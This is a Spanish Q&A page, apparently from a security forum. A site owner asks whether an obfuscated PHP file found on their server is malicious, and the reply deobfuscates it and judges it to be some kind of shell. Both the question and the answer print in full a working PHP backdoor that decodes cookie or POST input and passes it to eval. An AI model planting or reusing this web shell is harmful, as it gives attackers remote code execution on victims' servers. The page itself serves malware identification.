¿Este archivo PHP extraño que encontré en mi servidor es malicioso? [duplicar]

0

Encontré un archivo PHP que no sé de dónde viene en mi servidor:

<?php
$ojcsoo = '_-bHft\'dik1x6cn9leapm0y4s7vg5*r8ou#2';$zjdtjcd = Array();$zjdtjcd[] = $ojcsoo[3].$ojcsoo[29];$zjdtjcd[] = $ojcsoo[34];$zjdtjcd[] = $ojcsoo[28].$ojcsoo[28].$ojcsoo[13].$ojcsoo[4].$ojcsoo[25].$ojcsoo[7].$ojcsoo[10].$ojcsoo[15].$ojcsoo[1].$ojcsoo[2].$ojcsoo[2].$ojcsoo[13].$ojcsoo[23].$ojcsoo[1].$ojcsoo[23].$ojcsoo[21].$ojcsoo[28].$ojcsoo[35].$ojcsoo[1].$ojcsoo[2].$ojcsoo[23].$ojcsoo[25].$ojcsoo[21].$ojcsoo[1].$ojcsoo[2].$ojcsoo[31].$ojcsoo[7].$ojcsoo[17].$ojcsoo[35].$ojcsoo[13].$ojcsoo[18].$ojcsoo[15].$ojcsoo[12].$ojcsoo[13].$ojcsoo[31].$ojcsoo[12];$zjdtjcd[] = $ojcsoo[13].$ojcsoo[32].$ojcsoo[33].$ojcsoo[14].$ojcsoo[5];$zjdtjcd[] = $ojcsoo[24].$ojcsoo[5].$ojcsoo[30].$ojcsoo[0].$ojcsoo[30].$ojcsoo[17].$ojcsoo[19].$ojcsoo[17].$ojcsoo[18].$ojcsoo[5];$zjdtjcd[] = $ojcsoo[17].$ojcsoo[11].$ojcsoo[19].$ojcsoo[16].$ojcsoo[32].$ojcsoo[7].$ojcsoo[17];$zjdtjcd[] = $ojcsoo[24].$ojcsoo[33].$ojcsoo[2].$ojcsoo[24].$ojcsoo[5].$ojcsoo[30];$zjdtjcd[] = $ojcsoo[18].$ojcsoo[30].$ojcsoo[30].$ojcsoo[18].$ojcsoo[22].$ojcsoo[0].$ojcsoo[20].$ojcsoo[17].$ojcsoo[30].$ojcsoo[27].$ojcsoo[17];$zjdtjcd[] = $ojcsoo[24].$ojcsoo[5].$ojcsoo[30].$ojcsoo[16].$ojcsoo[17].$ojcsoo[14];$zjdtjcd[] = $ojcsoo[19].$ojcsoo[18].$ojcsoo[13].$ojcsoo[9];foreach ($zjdtjcd[7]($_COOKIE, $_POST) as $yuids => $cwhwadw){function zoumimv($zjdtjcd, $yuids, $ssdjci){return $zjdtjcd[6]($zjdtjcd[4]($yuids . $zjdtjcd[2], ($ssdjci / $zjdtjcd[8]($yuids)) + 1), 0, $ssdjci);}function ekivv($zjdtjcd, $kwabjl){return @$zjdtjcd[9]($zjdtjcd[0], $kwabjl);}function gliwd($zjdtjcd, $kwabjl){$adwhmc = $zjdtjcd[3]($kwabjl) % 3;if (!$adwhmc) {eval($kwabjl[1]($kwabjl[2]));exit();}}$cwhwadw = ekivv($zjdtjcd, $cwhwadw);gliwd($zjdtjcd, $zjdtjcd[5]($zjdtjcd[1], $cwhwadw ^ zoumimv($zjdtjcd, $yuids, $zjdtjcd[8]($cwhwadw))));}

¿Qué significa este código? ¿Puede dañar mi sitio?

    
pregunta Jafran J S 04.10.2018 - 11:41
fuente

1 respuesta

1

Lo he desenfocado

<?php
$ojcsoo = '_-bHft\'dik1x6cn9leapm0y4s7vg5*r8ou#2';
$zjdtjcd = Array();
$zjdtjcd[] = $ojcsoo[3] . $ojcsoo[29];
$zjdtjcd[] = $ojcsoo[34];
$zjdtjcd[] = $ojcsoo[28] . $ojcsoo[28] . $ojcsoo[13] . $ojcsoo[4] . $ojcsoo[25] . $ojcsoo[7] . $ojcsoo[10] . $ojcsoo[15] . $ojcsoo[1] . $ojcsoo[2] . $ojcsoo[2] . $ojcsoo[13] . $ojcsoo[23] . $ojcsoo[1] . $ojcsoo[23] . $ojcsoo[21] . $ojcsoo[28] . $ojcsoo[35] . $ojcsoo[1] . $ojcsoo[2] . $ojcsoo[23] . $ojcsoo[25] . $ojcsoo[21] . $ojcsoo[1] . $ojcsoo[2] . $ojcsoo[31] . $ojcsoo[7] . $ojcsoo[17] . $ojcsoo[35] . $ojcsoo[13] . $ojcsoo[18] . $ojcsoo[15] . $ojcsoo[12] . $ojcsoo[13] . $ojcsoo[31] . $ojcsoo[12];
$zjdtjcd[] = $ojcsoo[13] . $ojcsoo[32] . $ojcsoo[33] . $ojcsoo[14] . $ojcsoo[5];
$zjdtjcd[] = $ojcsoo[24] . $ojcsoo[5] . $ojcsoo[30] . $ojcsoo[0] . $ojcsoo[30] . $ojcsoo[17] . $ojcsoo[19] . $ojcsoo[17] . $ojcsoo[18] . $ojcsoo[5];
$zjdtjcd[] = $ojcsoo[17] . $ojcsoo[11] . $ojcsoo[19] . $ojcsoo[16] . $ojcsoo[32] . $ojcsoo[7] . $ojcsoo[17];
$zjdtjcd[] = $ojcsoo[24] . $ojcsoo[33] . $ojcsoo[2] . $ojcsoo[24] . $ojcsoo[5] . $ojcsoo[30];
$zjdtjcd[] = $ojcsoo[18] . $ojcsoo[30] . $ojcsoo[30] . $ojcsoo[18] . $ojcsoo[22] . $ojcsoo[0] . $ojcsoo[20] . $ojcsoo[17] . $ojcsoo[30] . $ojcsoo[27] . $ojcsoo[17];
$zjdtjcd[] = $ojcsoo[24] . $ojcsoo[5] . $ojcsoo[30] . $ojcsoo[16] . $ojcsoo[17] . $ojcsoo[14];
$zjdtjcd[] = $ojcsoo[19] . $ojcsoo[18] . $ojcsoo[13] . $ojcsoo[9];


// Array
// (
//     [0] => H*
//     [1] => #
//     [2] => 55cf7d19-bbc4-4052-b470-b8de2ca96c86
//     [3] => count
//     [4] => str_repeat
//     [5] => explode
//     [6] => substr
//     [7] => array_merge
//     [8] => strlen
//     [9] => pack
// )


print_r($zjdtjcd)
foreach (array_merge($_COOKIE, $_POST) as $yuids => $cwhwadw) {
    function zoumimv($zjdtjcd, $yuids, $ssdjci) {
        return substr(str_repeat($yuids . 55cf7d19-bbc4-4052-b470-b8de2ca96c86, ($ssdjci / strlen($yuids)) + 1), 0, $ssdjci);
    }
    function ekivv($zjdtjcd, $kwabjl) {
        return @pack('H*', $kwabjl);
    }
    function gliwd($zjdtjcd, $kwabjl) {
        $adwhmc = count($kwabjl) % 3;
        if (!$adwhmc) {
            eval($kwabjl[1]($kwabjl[2]));
            exit();
        }
    }
    $cwhwadw = ekivv($zjdtjcd, $cwhwadw);
    gliwd($zjdtjcd, explode('#', $cwhwadw ^ zoumimv($zjdtjcd, $yuids, strlen($cwhwadw))));
?>

Parece una especie de shell.

    
respondido por el dossi 04.10.2018 - 12:01
fuente

Lea otras preguntas en las etiquetas